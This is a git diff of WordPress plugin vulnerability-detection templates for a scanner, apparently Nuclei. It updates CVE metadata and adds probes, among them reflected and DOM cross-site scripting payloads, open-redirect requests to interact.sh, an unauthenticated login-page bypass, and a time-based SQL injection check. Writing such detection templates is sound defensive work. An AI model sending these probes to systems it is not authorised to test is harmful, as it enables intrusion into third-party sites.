     - https://nvd.nist.gov/vuln/detail/CVE-2021-24762
+    - https://wpscan.com/vulnerability/c1620905-7c31-4e62-80f5-1d9635be11ad
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-24762
     cwe-id: CWE-89
-  tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,unauth
+  tags: cve,wpscan,cve2021,sqli,wp,wordpress,wp-plugin,unauth,edb
 
 requests:
   - method: GET
@@ -24,15 +25,16 @@ requests:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 404
+      - type: dsl
+        dsl:
+          - 'duration>=4'
 
       - type: word
         part: header
         words:
           - "wp-ps-session"
 
-      - type: dsl
-        dsl:
-          - 'duration>=4'
+      - type: status
+        status:
+          - 404
+# Enhanced by mp on 2022/05/16
diff --git a/cves/2021/CVE-2021-24838.yaml b/cves/2021/CVE-2021-24838.yaml
index 4507004f34..66ac6d2839 100644
--- a/cves/2021/CVE-2021-24838.yaml
+++ b/cves/2021/CVE-2021-24838.yaml
@@ -1,32 +1,35 @@
 id: CVE-2021-24838
 
 info:
-  name: AnyComment <= 0.2.21 - Open Redirect
+  name: AnyComment < 0.3.5 - Open Redirect
   author: noobexploiter
   severity: medium
-  description: The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to
-    the vendor, is a feature.
+  description: |
+    The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to the vendor, is a feature.
   reference:
     - https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-24838
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-24838
     cwe-id: CWE-601
-  tags: cve,cve2021,wordpress,wp-plugin,open-redirect
+  metadata:
+    verified: "true"
+  tags: redirect,anycomment,wpscan,cve,cve2021,wordpress,wp-plugin
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com"
+      - "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh"
+      - "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh?a=https://interact.sh"
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
 
       - type: status
         status:
diff --git a/cves/2021/CVE-2021-24891.yaml b/cves/2021/CVE-2021-24891.yaml
new file mode 100644
index 0000000000..c312429522
--- /dev/null
+++ b/cves/2021/CVE-2021-24891.yaml
@@ -0,0 +1,50 @@
+id: CVE-2021-24891
+
+info:
+  name: WordPress Elementor Website Builder <3.1.4 - Cross-Site Scripting
+  author: dhiyaneshDk
+  severity: medium
+  description: |
+    WordPress Elementor Website Builder plugin before 3.1.4 contains a DOM cross-site scripting vulnerability. It does not sanitize or escape user input appended to the DOM via a malicious hash.
+  reference:
+    - https://www.jbelamor.com/xss-elementor-lightox.html
+    - https://wpscan.com/vulnerability/fbed0daa-007d-4f91-8d87-4bca7781de2d
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24891
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-24891
+    cwe-id: CWE-79
+  tags: wordpress,wp-plugin,elementor,wpscan,cve,cve2021,dom,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/elementor/assets/js/frontend.min.js"
+      - "{{BaseURL}}/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9"
+
+    extractors:
+      - type: regex
+        name: version
+        group: 1
+        regex:
+          - "elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"
+        internal: true
+
+      - type: kval
+        kval:
+          - version
+
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body_1
+        regex:
+          - "elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '> 1.5.0', '< 3.1.4') && status_code_1 == 200 && status_code_2 == 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-24910.yaml b/cves/2021/CVE-2021-24910.yaml
new file mode 100644
index 0000000000..4c73531631
--- /dev/null
+++ b/cves/2021/CVE-2021-24910.yaml
@@ -0,0 +1,45 @@
+id: CVE-2021-24910
+
+info:
+  name: WordPress Transposh Translation <1.0.8 - Cross-Site Scripting
+  author: Screamy
+  severity: medium
+  description: WordPress Transposh Translation plugin before 1.0.8 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the a parameter via an AJAX action (available to both unauthenticated and authenticated users when the curl library is installed) before outputting it back in the response.
+  reference:
+    - https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/
+    - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-24910.txt
+    - https://wpscan.com/vulnerability/b5cbebf4-5749-41a0-8be3-3333853fca17
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24910
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-24910
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve2021,wordpress,wp-plugin,xss,wp,wpscan,cve
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q=<img%20src%3dx%20onerror%3dalert(document.domain)>"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<img src=x onerror=alert(document.domain)>'
+          - '{"result":'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/28
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-24917.yaml b/cves/2021/CVE-2021-24917.yaml
new file mode 100644
index 0000000000..8b1db86298
--- /dev/null
+++ b/cves/2021/CVE-2021-24917.yaml
@@ -0,0 +1,43 @@
+id: CVE-2021-24917
+
+info:
+  name: WPS Hide Login < 1.9.1 - Protection Bypass with Referer-Header
+  author: akincibor
+  severity: high
+  description: The plugin has a bug which allows to get the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user.
+  reference:
+    - https://wpscan.com/vulnerability/15bb711a-7d70-4891-b7a2-c473e3e8b375
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24917
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24917
+  remediation: Fixed in version 1.9.1
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-24917
+    cwe-id: CWE-863
+  metadata:
+    verified: "true"
+  tags: cve2021,wp,wordpress,wp-plugin,unauth,wpscan,cve
+
+requests:
+  - raw:
+      - |
+        GET /wp-admin/options.php HTTP/1.1
+        Host: {{Hostname}}
+        Referer: something
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - 'redirect_to=%2Fwp-admin%2Fsomething&reauth=1'
+
+      - type: dsl
+        dsl:
+          - "!contains(tolower(location), 'wp-login.php')"
+
+    extractors:
+      - type: kval
+        kval:
+          - location
diff --git a/cves/2021/CVE-2021-24926.yaml b/cves/2021/CVE-2021-24926.yaml
index 7a8c1e8d7d..5b5dcc743e 100644
--- a/cves/2021/CVE-2021-24926.yaml
+++ b/cves/2021/CVE-2021-24926.yaml
@@ -1,17 +1,19 @@
 id: CVE-2021-24926
 
 info:
-  name: WordPress Plugin Domain Check < 1.0.17 - XSS
+  name: WordPress Domain Check <1.0.17 - Cross-Site Scripting
   author: cckuailong
   severity: medium
-  description: The Domain Check WordPress plugin before 1.0.17 does not sanitise and escape the domain parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting issue.
+  description: WordPress Domain Check plugin before 1.0.17 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the domain parameter before outputting it back in the page.
   reference:
     - https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24926
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
     cve-id: CVE-2021-24926
     cwe-id: CWE-79
-  tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
+  tags: wpscan,cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
 
 requests:
   - raw:
@@ -41,3 +43,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-24947.yaml b/cves/2021/CVE-2021-24947.yaml
index 89e73c4d71..083865bf20 100644
--- a/cves/2021/CVE-2021-24947.yaml
+++ b/cves/2021/CVE-2021-24947.yaml
@@ -3,16 +3,17 @@ id: CVE-2021-24947
 info:
   name: WordPress Responsive Vector Maps < 6.4.2 - Arbitrary File Read
   author: cckuailong
-  severity: high
-  description: WordPress Responsive Vector Maps < 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter
-    in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server.
+  severity: medium
+  description: WordPress Responsive Vector Maps < 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server.
   reference:
     - https://wpscan.com/vulnerability/c6bb12b1-6961-40bd-9110-edfa9ee41a18
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24947
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 6.5
     cve-id: CVE-2021-24947
-    cwe-id: CWE-23
-  tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,authenticated,lfr
+    cwe-id: CWE-863
+  tags: cve,authenticated,wpscan,cve2021,lfi,wp,wordpress,wp-plugin,lfr
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-24987.yaml b/cves/2021/CVE-2021-24987.yaml
index 319a078835..1213f8e753 100644
--- a/cves/2021/CVE-2021-24987.yaml
+++ b/cves/2021/CVE-2021-24987.yaml
@@ -1,11 +1,10 @@
 id: CVE-2021-24987
 
 info:
-  name: Super Socializer < 7.13.30 - Reflected Cross-Site Scripting
+  name: WordPress Super Socializer <7.13.30 - Cross-Site Scripting
   author: Akincibor
   severity: medium
-  description: The plugin does not sanitise and escape the urls parameter in its the_champ_sharing_count AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response,
-    leading to a Reflected Cross-Site Scripting issue.
+  description: WordPress Super Socializer plugin before 7.13.30 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the urls parameter in its the_champ_sharing_count AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response.
   reference:
     - https://wpscan.com/vulnerability/a14b668f-812f-46ee-827e-0996b378f7f0
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24987
@@ -14,7 +13,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2021-24987
     cwe-id: CWE-79
-  tags: xss,wp,wp-plugin,wordpress,cve,cve2021
+  tags: cve,cve2021,wpscan,xss,wp,wp-plugin,wordpress
 
 requests:
   - method: GET
@@ -36,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-24991.yaml b/cves/2021/CVE-2021-24991.yaml
index 14c8b6e45f..a8de905167 100644
--- a/cves/2021/CVE-2021-24991.yaml
+++ b/cves/2021/CVE-2021-24991.yaml
@@ -1,11 +1,10 @@
 id: CVE-2021-24991
 
 info:
-  name: The WooCommerce PDF Invoices & Packing Slips WordPress plugin < 2.10.5 - XSS
+  name: WooCommerce PDF Invoices & Packing Slips WordPress Plugin < 2.10.5 - Cross-Site Scripting
   author: cckuailong
   severity: medium
-  description: The WooCommerce PDF Invoices & Packing Slips WordPress plugin before 2.10.5 does not escape the tab and section parameters before outputting it back in an attribute, leading to a Reflected Cross-Site
-    Scripting in the admin dashboard.
+  description: The Wordpress plugin WooCommerce PDF Invoices & Packing Slips before 2.10.5 does not escape the tab and section parameters before reflecting it an attribute, leading to a reflected cross-site scripting in the admin dashboard.
   reference:
     - https://wpscan.com/vulnerability/88e706df-ae03-4665-94a3-db226e1f31a9
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24991
@@ -14,7 +13,7 @@ info:
     cvss-score: 4.8
     cve-id: CVE-2021-24991
     cwe-id: CWE-79
-  tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
+  tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated,wpscan
 
 requests:
   - raw:
@@ -44,3 +43,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by cs 08/16/2022
diff --git a/cves/2021/CVE-2021-24997.yaml b/cves/2021/CVE-2021-24997.yaml
index a63de780be..d6f4dad846 100644
--- a/cves/2021/CVE-2021-24997.yaml
+++ b/cves/2021/CVE-2021-24997.yaml
@@ -3,16 +3,19 @@ id: CVE-2021-24997
 info:
   name: Wordpress Guppy <=1.1 - User ID Disclosure
   author: Evan Rubinstein
+  severity: medium
   description: Instances of the Guppy Wordpress extension up to 1.1 are vulnerable to an API disclosure vulnerability which allows remote unauthenticated attackrs to obtain all user IDs, and then use that information to make API requests to either get messages sent between users, or send messages posing as one user to another.
   reference:
     - https://www.exploit-db.com/exploits/50540
     - https://patchstack.com/database/vulnerability/wp-guppy/wordpress-wp-guppy-plugin-1-2-sensitive-information-disclosure-vulnerability
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24997
+    - https://wpscan.com/vulnerability/747e6c7e-a167-4d82-b6e6-9e8613f0e900
   classification:
-    cvss-score: 5.4
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
+    cvss-score: 6.5
     cve-id: CVE-2021-24997
-    cwe-id: CWE-200
-  tags: wordpress,guppy,api,cve2021,cve,wp-plugin
+    cwe-id: CWE-862
+  tags: wordpress,guppy,api,cve2021,cve,wp-plugin,edb,wpscan
 
 requests:
   - method:
diff --git a/cves/2021/CVE-2021-25008.yaml b/cves/2021/CVE-2021-25008.yaml
index 7abdca8bd9..a3ce415928 100644
--- a/cves/2021/CVE-2021-25008.yaml
+++ b/cves/2021/CVE-2021-25008.yaml
@@ -1,10 +1,10 @@
 id: CVE-2021-25008
 
 info:
-  name: The Code Snippets WordPress plugin < 2.14.3 - XSS
+  name: The Code Snippets WordPress Plugin < 2.14.3 - Cross-Site Scripting
   author: cckuailong
   severity: medium
-  description: The Code Snippets WordPress plugin before 2.14.3 does not escape the snippets-safe-mode parameter before outputting it back in attributes, leading to a Reflected Cross-Site Scripting issue.
+  description: The Wordpress plugin Code Snippets before 2.14.3 does not escape the snippets-safe-mode parameter before reflecting it in attributes, leading to a reflected cross-site scripting issue.
   reference:
     - https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a
     - https://nvd.nist.gov/vuln/detail/CVE-2021-25008
@@ -13,7 +13,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2021-25008
     cwe-id: CWE-79
-  tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
+  tags: authenticated,wpscan,cve,cve2021,xss,wp,wordpress,wp-plugin
 
 requests:
   - raw:
@@ -42,3 +42,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by cs 08/16/2022
diff --git a/cves/2021/CVE-2021-25028.yaml b/cves/2021/CVE-2021-25028.yaml
index 95166d2193..af42ce3c83 100644
--- a/cves/2021/CVE-2021-25028.yaml
+++ b/cves/2021/CVE-2021-25028.yaml
@@ -14,17 +14,17 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2021-25028
     cwe-id: CWE-601
-  tags: cve,cve2021,wordpress,redirect,wp-plugin,eventtickets
+  tags: wordpress,redirect,wp-plugin,eventtickets,wpscan,cve,cve2021
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com"
+      - "{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://interact.sh"
 
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
 
 # Enhanced by mp on 2022/04/13
diff --git a/cves/2021/CVE-2021-25033.yaml b/cves/2021/CVE-2021-25033.yaml
index 9a759a6b94..f681ba8c96 100644
--- a/cves/2021/CVE-2021-25033.yaml
+++ b/cves/2021/CVE-2021-25033.yaml
@@ -1,27 +1,30 @@
-id: noptin-open-redirect
+id: CVE-2021-25033
 
 info:
   name: Noptin < 1.6.5 - Open Redirect
   author: dhiyaneshDk
-  severity: low
+  severity: medium
   description: Noptin < 1.6.5 is susceptible to an open redirect vulnerability. The plugin does not validate the "to" parameter before redirecting the user to its given value, leading to an open redirect issue.
   reference:
     - https://wpscan.com/vulnerability/c2d2384c-41b9-4aaf-b918-c1cfda58af5c
     - https://plugins.trac.wordpress.org/changeset/2639592
     - https://nvd.nist.gov/vuln/detail/CVE-2021-25033
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
     cve-id: CVE-2021-25033
-  tags: wordpress,redirect,wp-plugin,noptin,wp
+    cwe-id: CWE-601
+  tags: wp,wpscan,cve,cve2021,wordpress,redirect,wp-plugin,noptin
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/?noptin_ns=email_click&to=https://example.com"
+      - "{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh"
 
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
 
 # Enhanced by mp on 2022/04/13
diff --git a/cves/2021/CVE-2021-25052.yaml b/cves/2021/CVE-2021-25052.yaml
index b47921af1b..c836d8b9a5 100644
--- a/cves/2021/CVE-2021-25052.yaml
+++ b/cves/2021/CVE-2021-25052.yaml
@@ -1,20 +1,20 @@
 id: CVE-2021-25052
 
 info:
-  name: The Button Generator WordPress plugin < 2.3.3 - RFI
+  name: WordPress Button Generator <2.3.3 - Remote File Inclusion
   author: cckuailong
   severity: high
-  description: The Button Generator WordPress plugin before 2.3.3 within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus
-    leading to CSRF RCE.
+  description: WordPress Button Generator before 2.3.3 within the wow-company admin menu page allows arbitrary file inclusion with PHP extensions (as well as with data:// or http:// protocols), thus leading to cross-site request forgery and remote code execution.
   reference:
     - https://wpscan.com/vulnerability/a01844a0-0c43-4d96-b738-57fe5bfbd67a
     - https://nvd.nist.gov/vuln/detail/CVE-2021-25052
+    - https://plugins.trac.wordpress.org/changeset/2641639/button-generation
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2021-25052
     cwe-id: CWE-352
-  tags: cve,cve2021,rfi,wp,wordpress,wp-plugin,authenticated
+  tags: wp-plugin,authenticated,wpscan,cve,cve2021,rfi,wp,wordpress
 
 requests:
   - raw:
@@ -34,12 +34,15 @@ requests:
     cookie-reuse: true
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
 
       - type: word
         part: interactsh_protocol
         name: http
         words:
           - "http"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/06/27
diff --git a/cves/2021/CVE-2021-25055.yaml b/cves/2021/CVE-2021-25055.yaml
index f44b3b6b14..981b00395a 100644
--- a/cves/2021/CVE-2021-25055.yaml
+++ b/cves/2021/CVE-2021-25055.yaml
@@ -1,7 +1,7 @@
 id: CVE-2021-25055
 
 info:
-  name: WordPress FeedWordPress < 2022.0123 - Authenticated Reflected Cross-Site Scripting
+  name: WordPress FeedWordPress < 2022.0123 - Authenticated Cross-Site Scripting
   author: DhiyaneshDK
   severity: medium
   description: |
@@ -9,12 +9,13 @@ info:
   reference:
     - https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25055
+    - https://plugins.trac.wordpress.org/changeset/2662665
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-25055
     cwe-id: CWE-79
-  tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated
+  tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpscan
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-25063.yaml b/cves/2021/CVE-2021-25063.yaml
index 48a654dc21..bb9cde7acd 100644
--- a/cves/2021/CVE-2021-25063.yaml
+++ b/cves/2021/CVE-2021-25063.yaml
@@ -1,18 +1,19 @@
 id: CVE-2021-25063
 
 info:
-  name: Contact Form 7 Skins <= 2.5.0 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Contact Form 7 Skins <=2.5.0 - Cross-Site Scripting
   author: dhiyaneshDk
   severity: medium
-  description: The plugin does not sanitise and escape the tab parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting
+  description: WordPress Contact Form 7 Skins plugin 2.5.0 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the tab parameter before outputting it back in an admin page.
   reference:
     - https://wpscan.com/vulnerability/e2185887-3e53-4089-aa3f-981c944ee0bb
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-25063
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-25063
     cwe-id: CWE-79
-  tags: cve,cve2021wordpress,wp-plugin,xss,contactform,authenticated
+  tags: wpscan,cve,cve2021,wordpress,wp-plugin,xss,contactform,authenticated
 
 requests:
   - raw:
@@ -44,3 +45,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-25074.yaml b/cves/2021/CVE-2021-25074.yaml
index 4d0bc14d27..4fd3f95ebc 100644
--- a/cves/2021/CVE-2021-25074.yaml
+++ b/cves/2021/CVE-2021-25074.yaml
@@ -13,17 +13,17 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2021-25074
     cwe-id: CWE-601
-  tags: cve,cve2021,wordpress,redirect,wp-plugin,webpconverter
+  tags: redirect,wp-plugin,webpconverter,wpscan,cve,cve2021,wordpress
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com"
+      - "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh"
 
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
 
 # Enhanced by mp on 2022/04/21
diff --git a/cves/2021/CVE-2021-25075.yaml b/cves/2021/CVE-2021-25075.yaml
index 2d8145956b..4871b7b607 100644
--- a/cves/2021/CVE-2021-25075.yaml
+++ b/cves/2021/CVE-2021-25075.yaml
@@ -1,21 +1,22 @@
 id: CVE-2021-25075
 
 info:
-  name: WordPress Duplicate Page or Post < 1.5.1 - Stored XSS
+  name: WordPress Duplicate Page or Post <1.5.1 - Cross-Site Scripting
   author: DhiyaneshDK
   severity: low
   description: |
-    The plugin does not have any authorisation and has a flawed CSRF check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing any authenticated users, such as subscriber to call it and change the plugin's settings, or perform such attack via CSRF. Furthermore, due to the lack of escaping, this could lead to Stored Cross-Site Scripting issues.
-  remediation: Fixed in version 1.5.1.
+    WordPress Duplicate Page or Post plugin before 1.5.1 contains a stored cross-site scripting vulnerability. The plugin does not have any authorization and has a flawed cross-site request forgery check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing unauthenticated users to call it and change the plugin's settings, or perform such attack via cross-site request forgery.
   reference:
     - https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25075
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-25075
+  remediation: Fixed in version 1.5.1.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
-    cvss-score: 3.50
+    cvss-score: 3.5
     cve-id: CVE-2021-25075
     cwe-id: CWE-862
-  tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated
+  tags: wpscan,cve,cve2021,wordpress,xss,wp-plugin,authenticated
 
 requests:
   - raw:
@@ -58,3 +59,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-25085.yaml b/cves/2021/CVE-2021-25085.yaml
new file mode 100644
index 0000000000..250ce81d36
--- /dev/null
+++ b/cves/2021/CVE-2021-25085.yaml
@@ -0,0 +1,42 @@
+id: CVE-2021-25085
+
+info:
+  name: WOOF WordPress plugin - Cross-Site Scripting
+  author: Maximus Decimus
+  severity: medium
+  description: |
+    The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting.
+  reference:
+    - https://wpscan.com/vulnerability/b7dd81c6-6af1-4976-b928-421ca69bfa90
+    - https://plugins.trac.wordpress.org/changeset/2648751
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-25085
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-25085
+  metadata:
+    verified: true
+  tags: cve,cve2021,wordpress,wp-plugin,wp,xss,wpscan
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=<img%20src=x%20onerror=alert(document.domain)>"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"additional_fields":["<img src=x onerror=alert(document.domain)>"]}'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by cs 06/21/2022
diff --git a/cves/2021/CVE-2021-25111.yaml b/cves/2021/CVE-2021-25111.yaml
index 7c8f439e97..5f19090f61 100644
--- a/cves/2021/CVE-2021-25111.yaml
+++ b/cves/2021/CVE-2021-25111.yaml
@@ -7,7 +7,7 @@ info:
   description: The plugin does not validate the admin_custom_language_return_url before redirecting users o it, leading to an open redirect issue.
   reference:
     - https://wpscan.com/vulnerability/af548fab-96c2-4129-b609-e24aad0b1fc4
-  tags: wp-plugin,redirect,wordpress,wp,cve,cve2021,unauth
+  tags: cve2021,unauth,wpscan,wp-plugin,redirect,wordpress,wp,cve
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.10
@@ -17,10 +17,10 @@ info:
 requests:
   - method: GET
     path:
